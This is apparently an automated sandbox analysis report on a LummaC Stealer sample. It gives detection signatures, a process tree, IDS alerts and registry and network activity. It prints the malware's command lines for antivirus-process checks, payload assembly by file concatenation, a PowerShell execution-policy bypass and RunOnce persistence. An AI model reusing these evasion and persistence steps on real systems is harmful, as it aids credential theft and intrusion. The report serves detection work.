Windows Analysis Report
MilwaukeeRivers.exe

Overview

General Information

Sample name: MilwaukeeRivers.exe
Analysis ID: 1547706
MD5: e922a4d7d2c3c937231aa937b9a2ad25
SHA1: b78ade0fbd78bff01d5c86079c9224d7b87f0770
SHA256: bdc7b917477bb49af7a5b06e5d9ed20e08fed25944f297a6b36a50d03d8a5777
Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected LummaC Stealer
Yara detected UAC Bypass using CMSTP
Allocates memory in foreign processes
Connects to a pastebin service (likely for C&C)
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Query firmware table information (likely to detect VMs)
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Copy From or To System Directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files

Classification

  • System is w10x64_ra
  • MilwaukeeRivers.exe (PID: 3908 cmdline: "C:\Users\user\Desktop\MilwaukeeRivers.exe" MD5: E922A4D7D2C3C937231AA937B9A2AD25)
    • cmd.exe (PID: 6944 cmdline: "C:\Windows\System32\cmd.exe" /c copy Te Te.bat & Te.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6860 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6872 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7140 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6256 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7124 cmdline: cmd /c md 215655 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 6336 cmdline: findstr /V "GeologicalAllowStoryVirtually" Commitments MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6276 cmdline: cmd /c copy /b ..\Started + ..\Spend + ..\Seek + ..\Etc + ..\Reliability + ..\Lingerie + ..\Washing g MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Comparing.pif (PID: 6288 cmdline: Comparing.pif g MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • OHFHODKJNOQ3LDHM.exe (PID: 6532 cmdline: "C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe" MD5: 8FE60FF1954FF81AD6CAFF83914CF088)
          • more.com (PID: 3548 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
            • conhost.exe (PID: 2744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • explorer.exe (PID: 2120 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
        • powershell.exe (PID: 4888 cmdline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • AutoIt3.exe (PID: 1428 cmdline: "C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exe" "C:\Users\user\AppData\Local\Temp\LRAKKJ\Afflicted.a3x" MD5: 3F58A517F1F4796225137E7659AD2ADB)
          • GoogleUpdateCore.exe (PID: 5692 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 2464 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 3312 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 3364 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 4416 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 2840 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 2336 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 3540 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 4132 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 6064 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 7032 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 7048 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 6232 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 6264 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 1788 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 552 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 7128 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 6576 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 6564 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 6600 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 6560 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 364 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 1960 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 640 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 716 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 6092 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 1436 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 4952 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 3292 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 7028 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 7060 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 5888 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 1164 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 3916 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 3920 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 6044 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 3720 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 4808 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 4112 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 1640 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
      • choice.exe (PID: 6300 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • svchost.exe (PID: 7040 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 0000000C.00000003.1864702800.00000000014A2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security | |
| 00000016.00000002.2155048101.0000000004BC4000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | |
| 00000019.00000002.2404382599.0000000005102000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | |
| 0000000C.00000002.2521442122.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security | |

          System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Comparing.pif g, ParentImage: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif, ParentProcessId: 6288, ParentProcessName: Comparing.pif, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1", ProcessId: 4888, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Comparing.pif g, ParentImage: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif, ParentProcessId: 6288, ParentProcessName: Comparing.pif, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1", ProcessId: 4888, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Comparing.pif g, ParentImage: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif, ParentProcessId: 6288, ParentProcessName: Comparing.pif, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1", ProcessId: 4888, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\hbcfbdf\AutoIt3.exe" C:\hbcfbdf\ebhhaeg.a3x, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exe, ProcessId: 1428, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ebhhaeg
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: Comparing.pif g, CommandLine: Comparing.pif g, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Te Te.bat & Te.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6944, ParentProcessName: cmd.exe, ProcessCommandLine: Comparing.pif g, ProcessId: 6288, ProcessName: Comparing.pif
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c copy Te Te.bat & Te.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Te Te.bat & Te.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\MilwaukeeRivers.exe", ParentImage: C:\Users\user\Desktop\MilwaukeeRivers.exe, ParentProcessId: 3908, ParentProcessName: MilwaukeeRivers.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Te Te.bat & Te.bat, ProcessId: 6944, ProcessName: cmd.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Comparing.pif g, ParentImage: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif, ParentProcessId: 6288, ParentProcessName: Comparing.pif, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1", ProcessId: 4888, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7040, ProcessName: svchost.exe

          HIPS / PFW / Operating System Protection Evasion

Source: Process started | Author: Joe Security | Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Te Te.bat & Te.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6944, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 6256, ProcessName: findstr.exe
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-02T22:43:20.544444+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49711 | 104.21.32.51 | 443 | TCP |
| 2024-11-02T22:43:22.016016+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49712 | 104.21.32.51 | 443 | TCP |
| 2024-11-02T22:43:23.490359+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49713 | 104.21.32.51 | 443 | TCP |
| 2024-11-02T22:43:25.040508+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49714 | 104.21.32.51 | 443 | TCP |
| 2024-11-02T22:43:26.686661+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49715 | 104.21.32.51 | 443 | TCP |
| 2024-11-02T22:43:28.148926+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49716 | 104.21.32.51 | 443 | TCP |
| 2024-11-02T22:43:29.279003+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49717 | 104.21.32.51 | 443 | TCP |
| 2024-11-02T22:43:30.704957+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49718 | 104.21.32.51 | 443 | TCP |
| 2024-11-02T22:43:34.063945+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49719 | 104.21.32.51 | 443 | TCP |
| 2024-11-02T22:43:35.771884+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49720 | 188.114.96.3 | 443 | TCP |
| 2024-11-02T22:43:45.041673+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49721 | 172.67.75.40 | 443 | TCP |
| 2024-11-02T22:43:45.854972+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49722 | 188.114.97.3 | 443 | TCP |

| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-02T22:44:19.811419+0100 | 2856147 | 1 | A Network Trojan was detected | 192.168.2.16 | 49726 | 172.67.182.119 | 80 | TCP |

| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-02T22:44:17.298025+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.16 | 49725 | 172.67.182.119 | 80 | TCP |

| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-02T22:44:14.879941+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.16 | 49724 | 172.67.182.119 | 80 | TCP |
| 2024-11-02T22:44:19.811419+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.16 | 49726 | 172.67.182.119 | 80 | TCP |

          AV Detection

Source: C:\Users\user\AppData\Local\Temp\rrwkeeb | Joe Sandbox ML: detected

          Exploits

Source: Yara match | File source: 00000016.00000002.2155048101.0000000004BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.2404382599.0000000005102000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: MilwaukeeRivers.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.16:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.75.40:443 -> 192.168.2.16:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: MilwaukeeRivers.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\215655
